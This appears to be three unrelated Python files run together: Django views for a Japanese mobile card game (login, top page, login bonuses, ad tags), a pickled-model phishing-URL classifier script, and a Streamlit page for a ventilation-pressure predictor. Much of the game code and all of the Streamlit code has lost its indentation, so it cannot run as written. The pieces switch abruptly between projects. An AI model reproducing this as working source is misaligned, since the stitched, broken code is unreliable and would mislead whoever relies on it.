from module.weekdungeon.models import Dungeon
from module.panelmission.api import mission_clear_flash_cheack
from module.incentive.api import check_incentive_information
def auth_login(request):
    """Authenticate via username/password and redirect on success.

    GET renders the login form; POST attempts authentication and, when
    the user is valid and active, redirects to the view named by
    ``next`` (falling back to ``mobile_root_top``).
    """
    from django.contrib.auth import authenticate, login
    redirect_name = 'mobile_root_top'
    message = ''
    if request.method == 'POST':
        # NOTE: 'pasword' (sic) matches the field name posted by the form
        # template; keep the two in sync if either is ever renamed.
        if 'username' in request.POST and 'pasword' in request.POST:
            username = request.POST['username']
            password = request.POST['pasword']
            posted_next = request.POST.get('next')
            if posted_next:
                # Only honor a non-empty override of the redirect target.
                redirect_name = posted_next
            user = authenticate(username=username, password=password)
            if user is not None and user.is_active:
                login(request, user)
                return HttpResponseOpensocialRedirect(reverse(redirect_name))
            message = u'認証できませんでした'
    else:
        redirect_name = request.GET.get('next', redirect_name)
    ctxt = RequestContext(request, {
        'message': message,
        'next': redirect_name,
    })
    return render_to_response('root/auth/login.html', ctxt)
def auth_logout(request):
    """Terminate the current session and bounce back to the login page."""
    from django.contrib.auth import logout
    logout(request)
    return HttpResponseOpensocialRedirect(reverse('auth_login'))
def _log_daily_access(_debug=False):
    """Decorator factory that records one daily-access row per player.

    A raw ``EXISTS`` query keeps ``gamelog_dailyaccesslog`` to a single
    row per (osuser, date); the ``INSERT`` is issued only on the first
    access of the day.  ``_debug`` is accepted for caller compatibility
    but unused.
    """
    from functools import wraps
    from django.db import connection, transaction
    def decorator(view_func):
        @wraps(view_func)
        def _wrapped_view(request, *args, **kwds):
            player_id = request.player.pk
            now = datetime.datetime.now()
            smartphone = getattr(request, 'is_smartphone', False)
            cursor = connection.cursor()
            cursor.execute(
                'SELECT EXISTS (SELECT 1 FROM gamelog_dailyaccesslog WHERE osuser_id=%s AND DATE(accessed_at) = DATE(%s))',
                [player_id, now.strftime("%Y-%m-%d")])
            # EXISTS yields a single one-column row: 0 or 1.
            already_seen_today = cursor.fetchone()[0]
            if not already_seen_today:
                cursor.execute(
                    'INSERT INTO gamelog_dailyaccesslog(osuser_id,accessed_at,is_smartphone) VALUES(%s,%s,%s)',
                    [player_id, now.strftime("%Y-%m-%d %H:%M:%S"), smartphone])
                transaction.commit_unless_managed()
            return view_func(request, *args, **kwds)
        return _wrapped_view
    return decorator
@require_player
@_log_daily_access()
def root_top(request):
    """Render the application top page.

    Redirects users without a player record to the prologue, unconsented
    COLOPL users to the consent page, and players mid-tutorial back to
    the tutorial entry point; otherwise assembles notifications, banners
    and campaign data for the top template.
    """
    player = get_player_by_osuserid(request.osuser.userid)
    if player is None:
        # No player record yet: start from the prologue flow.
        return HttpResponseOpensocialRedirect(reverse('prologue_index'))
    # Ameba / mobcast pre-registration incentive hook.
    if settings.IS_AMEBA or settings.IS_MOBCAST:
        check_incentive_information(request, player.pk)
    if settings.IS_COLOPL and not player.consent.is_agree(1):
        return HttpResponseOpensocialRedirect(reverse('consent_colopl'))
    player = request.player
    if not player.is_end_tutorial():
        return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
    # Latest three notifications; smartphone clients additionally get a
    # category-3 list.
    notification_list = []
    notification_lists = []
    if request.is_smartphone:
        _, notification_list = get_notification_list(
            category=1, limit=3, sort=u'published_at', reverse=True)
        _, notification_lists = get_notification_list(
            category=3, limit=3, sort=u'published_at', reverse=True)
    else:
        _, notification_list = get_notification_list(
            limit=3, sort=u'published_at', reverse=True)
    fleshman_candidates = get_fleshman(player.pk, 1)
    fleshman = fleshman_candidates[0] if fleshman_candidates else None
    banners = get_banner_tag(ArrangeBase.TOPPAGE)
    # Published serial campaigns, newest first.
    serialcampaign_list = get_publish_serialcampaign_list()
    serialcampaign_list.reverse()
    gashapon_stamp = get_active_gashapon_stamp()
    from module.seek.api import HIDDEN_TYPE_APP_TOP, is_not_found
    is_seek_event = is_not_found(player, HIDDEN_TYPE_APP_TOP)
    ctxt = RequestContext(request, {
        'notification_list': notification_list,
        'notification_lists': notification_lists,
        'target_player': fleshman,
        'banners': banners,
        'serialcampaign_list': serialcampaign_list,
        'gashapon_stamp': gashapon_stamp,
        'is_seek_event': is_seek_event,
        'type': player.encryption(HIDDEN_TYPE_APP_TOP),
    })
    return render_to_response('root/top.html', ctxt)
#== Number of entries to show in a history list
def _history_list_select(history, num):
history_list = []
for i, hist in enumerate(history):
if i > num - 1:
break
history_list.append(hist)
return history_list
@require_player
@_log_daily_access()
@transaction_commit_on_success_hp
def root_index(request):
player = request.player
log_do_view_page_mypage()
if settings.IS_COLOPL and not player.consent.is_agree(1):
return HttpResponseOpensocialRedirect(reverse('consent_colopl'))
if player.growth == 0:
Information.reset_growth(player.pk)
# 浮いたセッション情報を消す
try:
request.session.pop("add_card_ids", None)
request.session.pop("buildup_add_id", None)
request.session.pop("buildup_result", None)
request.session.pop("checked_card_ids", None)
request.session.pop("buildup_is_include_rare", None)
request.session.pop("battle_ready_url", None)
request.session.pop("GROWTH_RETURN_URL", None)
request.session.pop("doli_raid2_result", None) # 一時対応
request.session.pop("tower_result", None) # 一時対応
except:
pass # セッション情報の削除に失敗してもガタガタ言わない
# 端末認証をチェックする -- 内部でキャッシュされている(gsocial)
if not player.flag_is_done_invite_callback():
isu_auth_device, is_auth_now = is_auth_device_and_just_authorized_now(request)
# たった今端末認証ができたので特典を付与する
if is_auth_now:
callback_invitation_end_player_tutorial(player)
player.flag_on_done_invite_callback()
player.save()
# 認証済み状態で後からライフサイクルイベントが来た場合、ここで報酬配布
if isu_auth_device and player.flag_is_need_invite_callback():
callback_invitation_end_player_tutorial(player)
player.flag_off_need_invite_callback()
player.flag_on_done_invite_callback()
player.save()
# コラボCP用ログインカウンタ
from module.papp.game.api.collabo_app.models import PlayerHistory
from module.papp.game.api.collabo_app.api import get_active_collabo
collabo = get_active_collabo()
if collabo:
PlayerHistory.increment_login_count(player.pk, request.osuser.age, collabo.pk, request.is_smartphone)
animation = _root_index_animation(request, player)
if animation:
return animation
# 最終ログイン日時を記録
player.set_last_login_at()
Event.induction(player)
Event.rare_boss_introduction(player)
Event.guerrilla_boss_introduction(player)
friend_count = get_friend_player_count(player)
#==戦闘履歴
battle_history_list = get_battle_history_list(player, limit=2)
#==挨拶履歴
bless_history_list = get_bless_histories(player.pk, request, limit=2)
my_guild = player.guild
#==最新3件のお知らせを表示
notification_list = list()
notification_lists = list()
if request.is_smartphone:
notification_pager, notification_list = get_notification_list(category=1, limit=3, sort=u'published_at', reverse=True)
notification_pager, notification_lists = get_notification_list(category=3, limit=3, sort=u'published_at', reverse=True)
else:
notification_pager, notification_list = get_notification_list(limit=3, sort=u'published_at', reverse=True)
# 未読の最新お知らせがある場合は、新着にのせる。
news_id = 0
before_news_id = player.get_latest_news()
try:
news_id = notification_list[0].id
except IndexError:
news_id = 0
if not before_news_id:
before_news_id = news_id
player.set_latest_news(news_id)
if before_news_id < news_id:
Information.set_notification(player.pk)
player.set_latest_news(news_id)
#補償アイテムがあるか
if not informations._get_compensation(player.pk):
get_player_compensations(player)
information = informations.get_messages(player.pk, request.is_smartphone)
for msg in Event(request).information():
information.append({'name': msg.title, 'url': msg.url})
# 自己紹介文章
mycomment = get_profile_comment(player)
banner_list = get_active_arrange_list()
banners_top = get_banner_tag(ArrangeBase.MYPAGE_TOP, banner_list)
banners_mid = get_banner_tag(ArrangeBase.MYPAGE_MIDDLE, banner_list)
banners_btm = get_banner_tag(ArrangeBase.MYPAGE_BOTTOM, banner_list)
banners_slide = get_banner_tag(ArrangeBase.MYPAGE_SLIDE, banner_list)
''' マイベッドのカード選出 '''
show_order = (1, 2, 3, 4, 5)
if not request.is_smartphone:
show_order = (4, 2, 1, 3, 5)
deck_list = get_deck_all(player)
player_cards = player.cards_cache()
mapper = {
1: get_player_attack_front_list,
2: get_player_defense_front_list,
}
leadercard = player.leader_player_card()
# 表示させるカードはコスト関係無いからコスト999固定値
# マイベットなので5人固定なのです
#show_card_list, _, _, _ = mapper[random.choice([1, 2])](player, 999, 5, player_cards)
#show_card_list = [x[1] for x in show_card_list]
show_card_list = []
show_card_list.append(leadercard)
# 表示するカードから、コメントを表示するカードを選出
comment_index = random.randint(1, len(show_card_list))
greet_card = show_card_list[comment_index - 1]
comment_index = show_order.index(comment_index) + 1
if not request.is_smartphone:
show_card_list += [DummyCard() for i in range(5 - len(show_card_list))] # カードが5枚以下の場合、ダミー画像を差し込む
show_card_list = [show_card_list[i - 1] for i in show_order] # カードを並び替える
# 自己紹介URL
if settings.IS_COLOPL:
myprofile_tag = containerdata['app_url'] % {"app_id": settings.APP_ID, "userid": player.pk}
elif settings.IS_AMEBA:
profile_url = "http://" + settings.SITE_DOMAIN + reverse("profile_show", args=[player.pk])
myprofile_tag_sp = '<a href="{}">マイベッド</a>'.format(profile_url)
myprofile_tag = myprofile_tag_sp
else:
profile_url = urllib.quote("http://" + settings.SITE_DOMAIN + reverse("profile_show", args=[player.pk]), "~")
fp_url = containerdata['app_url'] % {"app_id": settings.APP_ID}
fp_url += '?guid=ON&url=' + profile_url
if settings.IS_GREE:
if settings.OPENSOCIAL_SANDBOX:
platform_domain = 'pf-sb.gree.net/{}'.format(settings.APP_ID)
else:
platform_domain = 'pf.gree.net/{}'.format(settings.APP_ID)
profile_url_sp = urllib.quote("http://" + settings.SITE_DOMAIN_SP + reverse("profile_show", args=[player.pk]), "~")
sp_url = "http://" + platform_domain
sp_url += "?url=" + profile_url_sp
else:
sp_url = containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
sp_url += "?url=" + profile_url
if settings.IS_DGAME:
if settings.OPENSOCIAL_SANDBOX:
query = '?apid=%s&url=' % settings.APP_ID
sp_url = sp_url.replace('?url=', query)
fp_query = '?apid=%s&guid=ON&url=' % settings.APP_ID
fp_url = fp_url.replace('?guid=ON&url=', fp_query)
myprofile_tag_fp = '<dcon title="マイベッド(ケータイはこちら)" href="{}"/>'.format(fp_url)
myprofile_tag_sp = '<dcon title="マイベッド(スマートフォンはこちら)" href="{}"/>'.format(sp_url)
else:
myprofile_tag_fp = '<a href="{}">マイベッド(ケータイはこちら)</a>'.format(fp_url)
myprofile_tag_sp = '<a href="{}">マイベッド(スマートフォンはこちら)</a>'.format(sp_url)
myprofile_tag = myprofile_tag_sp + myprofile_tag_fp
#デッキの攻撃力、防御力
#(ここの処理は非常に重い。スマホでしか使用していないので、ガラケーでは計算しない。)
if request.is_smartphone:
front, back, _, _ = get_battle_member_list(player, BATTLE_SIDE_ATTACK, is_max=True, player_cards=player_cards, deck_list=deck_list)
attack_battle_power = sum([pc.attack() for pc in (front + back)])
front, back, _, _ = get_battle_member_list(player, BATTLE_SIDE_DEFENSE, is_max=True, player_cards=player_cards, deck_list=deck_list)
defense_battle_power = sum([pc.defense() for pc in (front + back)])
else:
# ガラケーのHTML側では利用していないはずだが、念のためダミーを定義
attack_battle_power = 1000
defense_battle_power = 1000
event_callback = Event(request)
event = event_callback.get_current_event()
event_callback.update_rescue_info()
info_msg = event_callback.get_group_match_info(player)
if info_msg == player:
# 返り値が同じならNoneに
info_msg = None
navi_message = get_navi_message(player, request.is_smartphone)
event_boss_info = event_callback.get_event_boss_info()
is_rescue = None
if event_boss_info:
is_rescue = event_boss_info.get('is_rescue', None)
event_navi_message = select_navi_message(player, event, is_rescue, info_msg)
limited_shop_list = get_limited_shop_list()
limited_shop = None
if limited_shop_list:
limited_shop = limited_shop_list[0]
campaign = get_active_buildup_campaign(player)
is_bookmark_close = player.get_bookmark_close
ad_params = {}
if settings.IS_GREE:
ad_params = _get_advertise_params(request)
archive_bonus_init_kvs = player.get_kvs('archive_bonus')
if not archive_bonus_init_kvs.get(False):
from module.playercard.api import init_archive_or_love_max_bonus
init_archive_or_love_max_bonus(player)
archive_bonus_init_kvs.set(True)
if not event:
events = get_opening_events()
if events:
event = events[0]
if event:
event_index_viewname = 'event{}:event_common_index'.format(event.id)
else:
event_index_viewname = 'event_common_index'
# ameba用のドットマネー対応
dotmoney_stat = {}
if settings.IS_AMEBA:
if not settings.OPENSOCIAL_DEBUG:
achievement = Achievement(request)
dotmoney_stat = achievement.get_stat(player.pk)
item_box_count_stat = achievement.get_item_box_count(player.pk)
today = datetime.date.today()
expiration_date = datetime.date(today.year, today.month, 1) + relativedelta(months=1) - datetime.timedelta(days=1)
dotmoney_left_day = expiration_date - today
if item_box_count_stat and 'item_box_count' in item_box_count_stat and item_box_count_stat['item_box_count'] > 0:
information.append({'name': u'ドットマネーの交換アイテムが届いています!', 'url': reverse('gift_index')})
if dotmoney_stat:
if 'amebapoint_center_text' in dotmoney_stat and 'amebapoint_top_url' in dotmoney_stat:
information.append({'name': u'【アメーバからのお知らせ】{}'.format(dotmoney_stat['amebapoint_center_text']), 'url': dotmoney_stat['amebapoint_top_url']})
if dotmoney_left_day.days <= 7 and 'expiration_point' in dotmoney_stat:
if dotmoney_left_day.days >= 2:
dot_info_msg = u'あと{}日で'.format(dotmoney_left_day.days)
else:
dot_info_msg = u'本日'
dot_info_msg = u'{}あなたのドットマネー {}マネーが失効します'.format(dot_info_msg, intcomma(int(dotmoney_stat['expiration_point'])))
information.append({'name': u'【アメーバからのお知らせ】{}'.format(dot_info_msg), 'url': '#'})
# mobcast用のペロ対応
pero_stat = {}
if settings.IS_MOBCAST:
if not settings.OPENSOCIAL_DEBUG:
achievement = Achievement(request)
pero_stat = achievement.get_stat(player.pk)
if greet_card:
if greet_card.rarity >= 19:
mybed_card_voice = greet_card.detail.voice_url_by_id(2)
else:
mybed_card_voice = greet_card.detail.voice_url_by_id(random.choice(range(1, 15)))
ctxt = RequestContext(request, {
'player_card_front_list': show_card_list,
'friend_count': friend_count,
'battle_history_list': battle_history_list,
'bless_history_list': bless_history_list,
'notification_list': notification_list,
'notification_lists': notification_lists,
'banners_top': banners_top,
'banners_mid': banners_mid,
'banners_btm': banners_btm,
'banners_slide': banners_slide,
'mycomment': mycomment,
'information': information,
'greet_card': greet_card,
'idx': comment_index,
'my_guild': my_guild,
'attack_battle_power': attack_battle_power,
'defense_battle_power': defense_battle_power,
'myprofile_tag': myprofile_tag,
'campaign': campaign,
'event': event,
'event_index_viewname': event_index_viewname,
'limited_shop': limited_shop,
'guild_pet': get_current_pet(),
'is_bookmark_close': is_bookmark_close,
'ad_params': ad_params,
'navi_message': navi_message,
'event_navi_message': event_navi_message,
'group_match_info': info_msg,
'event_boss_info': event_boss_info,
'enable_dungeon': Dungeon.get_dungeon_list(),
'dotmoney_stat': dotmoney_stat,
'pero_stat': pero_stat,
'mybed_card_voice': mybed_card_voice,
})
response = render_to_response('root/index.html', ctxt)
return response
@require_player
def mood_callback(request):
    """Grant the one-time mood-send reward, then bounce back to mypage."""
    reward_flag = request.player.get_kvs('fgacha_302')
    if not reward_flag.get():
        from module.gift.api import npc_give_gift
        npc_give_gift(
            request.player.pk,
            settings.ENTITY_TYPE_ITEM,
            206,
            1,
            u'{}送信による報酬です。'.format(T.SNS_SAY),
        )
        reward_flag.set(True)
    return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
def _get_mood_send_limit(player):
    """Daily-limited cache slot used to throttle mood sends per player."""
    cache_key = "gashapon_sendmood1224:" + player.pk
    return get_cache_limit_of_day(cache_key, 0)
def ad_program(player):
    """Build the conversion-tag ("seika tag") key for the three GREE ad
    programs.

    Returns None when no player is given.
    """
    import hashlib
    if not player:
        return None
    digest = hashlib.md5('%s%s' % (player.pk, T.AD_PROGRAM_KEY)).hexdigest()
    return '%s_%s' % (player.pk, digest)
def _generate_growth_list(growth):
'''
良い感じのステップの配列をつくる
'''
result = []
for v in range(growth + 1):
if v <= 0:
continue
if v <= 10:
result.append(v)
elif v % 5 == 0:
result.append(v)
if growth > 10 and growth % 5 != 0:
result.append(growth)
return result
@require_player
def root_growth_index(request):
    """Render the growth (stat-point allocation) page."""
    growth_list = _generate_growth_list(request.player.growth)
    if Event(request).get_current_event():
        event_banner = Event(request).get_encount_banner_callback() or u''
    else:
        event_banner = u''
    context = RequestContext(request, {
        'growth_list': growth_list,
        'event_banner': event_banner,
    })
    return render_to_response('root/growth.html', context)
@require_player
def root_end_event_list(request):
    """Render the list of events that are in their closing period."""
    context = RequestContext(request, {'end_event_list': get_ending_events()})
    return render_to_response('root/end_event_list.html', context)
@require_player
def root_zoning_index(request):
    """Render the zoning page (static template, no extra context)."""
    return render_to_response('root/zoning.html', RequestContext(request, {}))
@require_player
def root_growth_execution(request, category=0):
    """Apply growth points to one stat, then redirect to the result page.

    ``category`` selects the stat (1=vitality, 2=attack, 3=defense); the
    number of points comes from the ``growth_val`` POST parameter.

    Raises:
        KeyError: if ``category`` is not 1, 2 or 3 (same as before).
        ValueError: if ``growth_val`` is not an integer (same as before).
    """
    player = request.player
    # The original had a redundant ``category = category`` self-assignment
    # and wrapped each bound method in a needless lambda; both removed.
    category = int(category)
    number = int(request.POST.get('growth_val', 0))
    log_do_growth(player, number, category)
    growth_map = {
        1: player.growth_vitality,
        2: player.growth_attack,
        3: player.growth_defense,
    }
    growth_map[category](number)
    player.save(force_update=True)
    if player.growth == 0:
        # All points spent -- clear the "growth available" notification.
        Information.reset_growth(player.pk)
    return HttpResponseOpensocialRedirect(reverse('root_growth_result', args=[category, number]))
@require_player
def root_growth_result(request, category, number):
    """Show the result of a growth allocation, or bounce back to the caller.

    When the player has no growth points left and a return URL was stashed
    in the session, redirect there instead of rendering the page.
    """
    growth = request.player.growth
    if not growth:
        # Nothing left to allocate -- return to where the flow was entered.
        return_url = request.session.get('GROWTH_RETURN_URL')
        if return_url:
            request.session['GROWTH_RETURN_URL'] = None
            return HttpResponseOpensocialRedirect(return_url)
    event_banner = u''
    if Event(request).get_current_event():
        event_banner = Event(request).get_encount_banner_callback() or u''
    context = RequestContext(request, {
        'category': int(category),
        'number': number,
        'growth_list': _generate_growth_list(growth),
        'event_banner': event_banner,
    })
    return render_to_response('root/growth.html', context)
@require_player
def root_cooperate(request):
    """Render the cooperation page (static template, empty context)."""
    return render_to_response('root/cooperate.html', RequestContext(request, {}))
@require_player
def root_fleshman_list(request):
    """Render up to 10 recently registered ("freshman") players."""
    context = RequestContext(request, {
        'player_list': get_fleshman(request.player.pk, 10),
    })
    return render_to_response('root/fleshman_list.html', context)
def _root_index_animation(request, player):
    """Return a redirect to the first login bonus/production that fires for
    this player, or None when nothing needs to be shown.

    The checks run in strict priority order and the first hit
    short-circuits; ``flash_manager`` caps how many flash movies are shown
    (``can_show_movie`` / ``count_up``). As a side effect the free-gacha
    notification flag is refreshed at the end.
    """
    flash_manager = PromotionFlashManager(player)
    # Registration campaign
    regist_campaign = get_active_regist_campaign(player)
    if regist_campaign and flash_manager.can_show_movie():
        flag = acquire_regist_campaign(player, regist_campaign)
        if flag:
            return HttpResponseOpensocialRedirect(reverse('regist_campaign_production', args=[regist_campaign.pk]))
    # Comeback campaign (only players who have logged in before qualify)
    if player.get_last_login_at():
        comebackbonus = get_valid_comebackbonus()
        if comebackbonus:
            acquire_comebackbonus_id = acquire_comebackbonus(request, comebackbonus)
            if acquire_comebackbonus_id:
                if comebackbonus.flag_is_continuous_campaign():
                    return HttpResponseOpensocialRedirect(reverse('comeback_login_production'))
                return HttpResponseOpensocialRedirect(reverse('comebackbonus_index', args=[]), request)
    # Advent box reward
    advent_box = get_active_advent_box()
    if advent_box and flash_manager.can_show_movie():
        advent_box_history = getattr(request, 'login_bonus_history', None) or get_latest_advent_box_history(player)
        advent_box, position = acquire_advent_box(player, advent_box_history)
        if advent_box and position:
            flash_manager.count_up()
            return HttpResponseOpensocialRedirect(reverse('advent_box_production', args=[advent_box.pk]))
    # Login stamp card
    login_stamp = get_extra_or_active_login_stamp(player)
    if login_stamp and flash_manager.can_show_movie():
        login_stamp_history = getattr(request, 'login_bonus_history', None)
        # request.login_bonus_history may hold an advent-box history object;
        # in that case fetch the proper login-stamp history instead.
        if login_stamp_history is None or isinstance(login_stamp_history, PlayerAdventBoxRewardHistory):
            login_stamp_history = get_latest_login_stamp_history(player, login_stamp)
        try:
            login_stamp, position, step, step_count = acquire_login_stamp(player, login_stamp_history, login_stamp)
        except LoginStamp.ContinuationException:
            return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
        if login_stamp:
            flash_manager.count_up()
            return HttpResponseOpensocialRedirect(reverse('login_stamp_production', args=[login_stamp.pk, position, step, step_count]))
    # Continuance (consecutive-login) bonus
    if check_continuance_bonus(player) and flash_manager.can_show_movie():
        flash_manager.count_up()
        return HttpResponseOpensocialRedirect(reverse('continuance_bonus_production', args=[]))
    # Plain login bonus
    if flash_manager.can_show_movie():
        login_bonus_list = get_valid_loginbonus_list()
        login_bonus_list = acquire_login_bonus(player, login_bonus_list, request)
        if login_bonus_list:
            flash_manager.count_up()
            return HttpResponseOpensocialRedirect(reverse('login_bonus_production', args=[login_bonus_list[0].group]))
    # Panel-mission clear flash
    if flash_manager.can_show_movie() and mission_clear_flash_cheack(player.pk):
        flash_manager.count_up()
        return HttpResponseOpensocialRedirect(reverse('panelmission_mission_clear_execution'))
    # Reward (continuation) campaign -- only trigger_id == 1 applies here
    continuationcampaign_list = get_valid_continuationcampaign()
    continuationcampaign = [r for r in continuationcampaign_list if r.trigger_id == 1]
    if continuationcampaign:
        if flash_manager.can_show_movie() and check_and_do_continuationcampaign(player, continuationcampaign[0]):
            flash_manager.count_up()
            return HttpResponseOpensocialRedirect(reverse('continuationcampaign_production', args=[]))
    # Free gacha availability: refresh the notification flag either way
    time_free_gashapon = player_time_free_gashapon(request)
    free_gashapons = [player_one_time_per_day_gashapon(player), time_free_gashapon]
    is_gashapon_enable = False
    for gashapon in free_gashapons:
        if gashapon and gashapon.is_enable():
            Information.set_normal_gacha(player.pk)
            is_gashapon_enable = True
            break
    if not is_gashapon_enable:
        Information.reset_normal_gacha(player.pk)
    return None
def auth_device_error(request):
    """Render the unsupported-device error page and drop the scid cookie."""
    response = render_to_response('root/auth_device_error.html', RequestContext(request, {}))
    response.delete_cookie('scid')
    return response
def root_auth(request):
    """iOS6 workaround: stamp a created_at cookie, then bounce to app top."""
    import time
    if settings.OPENSOCIAL_DEBUG:
        callback_url = '/m/'
    else:
        callback_url = containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
    response = HttpResponseRedirect(callback_url)
    # 2592000 seconds == 30 days
    response.set_cookie("created_at", time.time(), max_age=2592000, path='/')
    return response
def grant_strage_access(request):
    """mixi support: render the storage-access grant page."""
    if settings.OPENSOCIAL_DEBUG:
        callback_url = '/m/'
    else:
        callback_url = containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
    context = RequestContext(request, {'callback_url': callback_url})
    return render_to_response('root/grant_strage_access.html', context)
@require_player
def bookmark_close(request):
    """Remember that the player closed the bookmark banner; reply via AJAX."""
    request.player.set_bookmark_close()
    ajax = AjaxHandler(request)
    ajax.set_ajax_param('text', "OK")
    return HttpResponse(ajax.get_ajax_param({}), mimetype='text/json')
@require_player
def root_anim_invitation_introduce(request):
    """Play the invitation-introduce SWF, then land on the invitation page."""
    redirect_url = reverse("invitation_index")
    return render_swf(request, 'root/invitation_introduce', redirect_url, {})
def _get_advertise_params(request):
    """Build the GREE login-ad tag parameters for players who have logged
    in ``settings.GREEAD_LOGIN_COUNT`` days in a row; returns {} otherwise.

    The 'gree_ad_login_campaign' KVS flag ensures the tag is emitted at
    most once per player.
    """
    # Quick-and-dirty support (original note): show the tag to users who
    # logged in on 3 consecutive days.
    import hashlib
    player = request.player
    sha256_osuser_id = hashlib.sha256(player.pk).hexdigest()
    key = settings.GREEAD_LOGIN_ADVERTISEMENT + u':' + settings.GREEAD_LOGIN_CAMPAIGN_ID + u':' + str(sha256_osuser_id) + u':' + settings.GREEAD_LOGIN_SITE_KEY
    digest = hashlib.sha256(key).hexdigest()
    is_staging = settings.OPENSOCIAL_SANDBOX
    is_product = not is_staging and not settings.DEBUG
    kvs = player.get_kvs('gree_ad_login_campaign')
    # NOTE(review): this only ever fires on the single day when
    # regist_past_day == GREEAD_LOGIN_COUNT, and the KVS flag is set only
    # when the login-count check passes -- confirm this one-shot window is
    # intended.
    if not kvs.get() and player.regist_past_day == settings.GREEAD_LOGIN_COUNT:
        login_count = DailyAccessLog.objects.using("read").filter(osuser_id=player.pk).count()
        if login_count >= settings.GREEAD_LOGIN_COUNT:
            params = {
                # 'ad_program_md5_key': ad_program(request.opensocial_viewer_id),
                "sha256_osuser_id": sha256_osuser_id,
                "digest": digest,
                "is_product": is_product,
            }
            kvs.set(True)
        else:
            params = {}
    else:
        params = {}
    return params
def _logging_special_users(player_id, message):
    '''
    Log ``message`` for a small whitelist of user IDs (GREE only).

    Temporary debugging aid; the original note asks for its removal once
    the investigation is done (2017/04/27 by kyou).

    NOTE: the second parameter was named ``str``, shadowing the builtin;
    renamed to ``message`` (this private helper is called positionally).
    '''
    if not settings.IS_GREE:
        return
    import logging
    SPECIAL_USER_IDS = [
        u'17023',
        u'16928030',
        u'6704082',
        u'16163103',
    ]
    if player_id in SPECIAL_USER_IDS:
        logging.error('[SPECIAL {}] {}'.format(player_id, message))
@require_player
def dgame_api_test(request):
    """Post the dGame 'login3days' achievement record, then go to top."""
    ActionRecord(request).post_record(request.player.pk, 'login3days')
    return HttpResponseOpensocialRedirect(reverse('mobile_root_top'))
@require_player
def xr_anim(request, page):
    """Render the XR ("miyabi effect") card-animation page for ``page``.

    Fixes: the original return line carried fused non-Python metadata text
    (extraction garbage) which has been stripped, and an unused
    ``player = request.player`` local has been removed.
    """
    ctxt = RequestContext(request, {
        'page_id': page,
    })
    return render_to_response('card/miyabiEffect/' + page + '/main.html', ctxt)
import sys
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
# Load the pre-trained model artifacts once, at import time.
# NOTE(review): pickle.load executes arbitrary code from the file -- this is
# only safe when 'classifier'/'vectorizer' are trusted, locally produced
# artifacts, never user-supplied input.
classifier=pickle.load(open('classifier',"rb"))
vectorizer=pickle.load(open('vectorizer',"rb"))
def check_fishing_link(url):
    """Classify ``url`` with the pickled model.

    Returns 0 when the model labels it 'good', 1 (phishing) otherwise.

    NOTE: the parameter was named ``input``, shadowing the builtin; renamed
    to ``url`` (the only call site passes it positionally). Also removed the
    stray C-style semicolons.
    """
    features = vectorizer.transform([url]).toarray()
    prediction = classifier.predict(features)
    # predict() returns a one-element array for a single sample; index it
    # explicitly instead of relying on array truthiness.
    if prediction[0] == 'good':
        return 0
    return 1
if __name__ == "__main__":
    # Join all CLI arguments into one string (the URL to classify) and print
    # the 0/1 verdict. The __main__ guard stops this side effect from running
    # when the module is imported; behaviour as a script is unchanged.
    url = ''.join(sys.argv[1:])
    print(check_fishing_link(url))
| divsingh14/Phisproof | ch.py | ch.py | py | 549 | python | en | code | 0 | github-code | 90 |
import pandas as pd
import numpy as np
import streamlit as st
import requests
from Api_request import make_api_request_with_features, make_api_request_with_id
import time
import matplotlib.pyplot as plt
from Calculate_mae import mean_absolute_error
from matplotlib.patches import Rectangle
from streamlit_lottie import st_lottie_spinner
from streamlit_extras.stoggle import stoggle
from streamlit_card import card
#Config name of the page
st.set_page_config (page_title='Mechanical ventilation')
# ------- 1 - Title and info session ---------
#Title
st.title('Ventilation Pressure Predictor')
st.sidebar.title("Navigation")
page = st.sidebar.radio("Go to", ["Predictor", "Our Project"])
if page == "Our Project":
st.subheader("What is this project about ? 🤔")
st.write("""What do doctors do when a patient has trouble breathing?
They use a ventilator to pump oxygen into a sedated patient's lungs
via a tube in the windpipe. **Mechanical ventilation** is a clinician-intensive procedure.
Developing new methods for controlling mechanical ventilators is prohibitively
expensive💰""")
st.write(" ")
st.write("""In this project, we have **simulated** a ventilator connected to a
sedated patient's lung using **Deep Learning models**.
We will help overcome the cost barrier of developing new methods for controlling
mechanical ventilators. This will pave the way for algorithms that adapt to patients and reduce
the burden on clinicians during these novel times and beyond. **As a result, ventilator treatments
may become more widely available to help patients breathe.**""")
st.write(" ")
st.write("If you want more information, check out this [link](https://github.com/UKVeteran/Mechanical-Ventilation-Prediction/blob/7be8a38d9b6db60aff2aef91a2c664e801760299/README.md#L4)")
st.write(" ")
st.write(" ")
st.write("Contact the members of the team:")
#This markdown remove the double arrows on top right of the images
st.markdown("""
<style>
.css-6awftf {
display: none;
visibility: hidden;
}
</style>
""", unsafe_allow_html=True)
col1, col2, col3, col4 = st.columns(4, gap="small")
with col1:
image = st.image("Johar.jpg")
github_url = "https://github.com/UKVeteran"
st.markdown("<h4 style='text-align: center; color: red;'>Johar</h4>", unsafe_allow_html=True)
github_url = "https://github.com/UKVeteran"
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/jmashfaque/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col2:
image = st.image("GB_picture.jpg")
github_url = "https://github.com/Guillaume2126"
st.markdown("<h4 style='text-align: center; color: green;'>Guillaume</h4>", unsafe_allow_html=True)
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/guillaumebretel/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col3:
image = st.image("Dilara3.jpg")
github_url = "https://github.com/dilarah"
st.markdown("<h4 style='text-align: center; color: blue;'>Dilara</h4>", unsafe_allow_html=True)
